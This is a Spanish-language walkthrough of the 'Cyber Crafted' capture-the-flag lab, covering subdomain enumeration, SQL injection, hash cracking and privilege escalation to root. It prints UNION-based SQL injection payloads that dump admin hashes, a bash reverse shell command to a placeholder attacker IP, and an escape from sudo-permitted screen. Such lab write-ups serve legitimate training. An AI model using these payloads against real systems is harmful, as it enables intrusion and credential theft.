Cyber Crafted
En esta maquina vamos a realizar explotacion de un servicio web en la cual debnemos enumerar los sundominios, es tos subdominios encontraremos un panel donde es vulnerable a sql injection para encontrar credenciales validas. Para la escalada de privilegios haremos uso de credenciales que encontraremos enumerando el sistema para luego explotar un binario que tenemos permisos privilegiados.

Link cybercrafted
Created by madrinch
Walkthrough
Enumeración
Empezamos a enumerar los puertos que estan abiertos de la maquina victima
Teniendo conocimiento cada uno de los puertos abiertos, pasamos a enumerar cada uno de los servicios y versiones de estos puertos
Los puertos que encotramos son: 22, 80 y 25565
Puerto 80
Enumerando el puerto 80 tendremos que nos redirige a un dominio. Dominio que agregaremos en el /etc/hosts
Visitando el sitio web encontraremos el siguiente contenido

Enumerando de manera visual, no encontramos nada. Realizaremos una enumeración de los directorios del sitio web haciendo uso de ffuf, pero no encontramos nada interesante asi que procedi a enumerar subdominios
Fuzzing

Enumerando los subdominio encontré tres :
En admin.cybercrafted.thm encontraremos un panel de login que no se puede hacer mucho.

Viendo el contenido de cada uno de los otros subdominios no se encontró mucho, por lo que pasamos a enumerar los directorios. En el subdominio que si encontramos algo interesante es: store.cybercrafted.thm

Explotación
SQL injection
store.cybercrafted.thm/search.php Encont!ramos un panel de busqueda de items, que hace una consulta a una base de datos. 20231121155647.png
Ingreseando seven' union select 1,2,3,4-- - podemos ver que el 2,3,4 nos muestra en la fila.

Procederemos a enumerar los nombres de las bases de datos seven' union select 1,schema_name,3,4 from information_schema.schemata--

Nos encontramos con las siguientes bases de datos:
La que nos parece interesante es webapp, por lo que enumeraremos las tablas que contiene esta base de datos.

La base de datos webapp contiene dos tablas que son admin y stock
Continuamos con la enumeración de la base de datos, en esta enumeraremos las columnas que contiene la tabla.

Tenemos las columnas de id, user y hash. Conociendo estos datos realizaremos una consulta a la tabla con los siguiente: seven' union select 1,id,user,hash from webapp.admin-- -

Cracking de hashes
Nos encontramos con credenciales que parecen estar encriptadas, así que procederemos a crackearlas con Crackstation. Existen varias herramientas que te pueden ayudar a crackear, asi que sientete libre de usar la que se te hace mas comoda

Usaremos estas credenciales para ingresar al panel de login que vimos al inicio que se encuentra en : http://admin.cybercrafted.thm/
Ejecución de comandos
Podemos ejecutar comandos. Ahora lo que haremos será enviarnos una revershell para obtener una consola de la maquina victima.

Ingresamos el siguiente comando: bash -c 'exec bash -i &>/dev/tcp/[IP-ATTACKER]/443 <&1' en mi caso es lo que mayormente suelo usar, tu puedes usar otro si gustas
Escalada de privilegios
Usuario www-data
Una vez obtenida la shell como el usuario www-data

Enumerando encontraremos un archivo id_rsa que tenemos permisos para leerlo

Con este archivo podemos ingresar por ssh sin proporcionar credenciales, pero antes tenemos que crackearla debido a que esta protegida por contraseña
Generamos el hash con
ssh2john
Crackeamos con
john
Cambiamos los permisos de archivo
ìd_rsa
Ejecutamos
Ingresamos la contraseña y podemos ingresar como el usuario
xxultimatecreeperxx
Usuario - xxultimatecreeperxx
Enumerando las ta20231121175040.pngreas que se ejecutan en el sistema, podemos observar una, de esto nos interesa la ruta donde se se realizando el comprimido

Antes de ir al directorio vemos que pertenecemos a un grupo llamando minecraft
Por lo que tenemos permisos para ingresar a la directorio y poder leer cada uno de los archivos.

En especial uno que nos llama la atención que es log.txt en donde encontraremos unas credenciales que permitirán iniciar sesión como el usuario cybercrafted


Usuario - cybercrafted
Teniendo credenciales validad para este usuario, procedemos a enumerar y podemos ver que el usuario puede ejecutar /usr/bin/screen -r cybercrafted de manera privilegiada

Por lo que ejecutamos

Ahora para escapar precionamos las teclas ctrl + A y luego ctrl+ C
Usuario - root

¡VAMOS!
Happy hacking :)
Last updated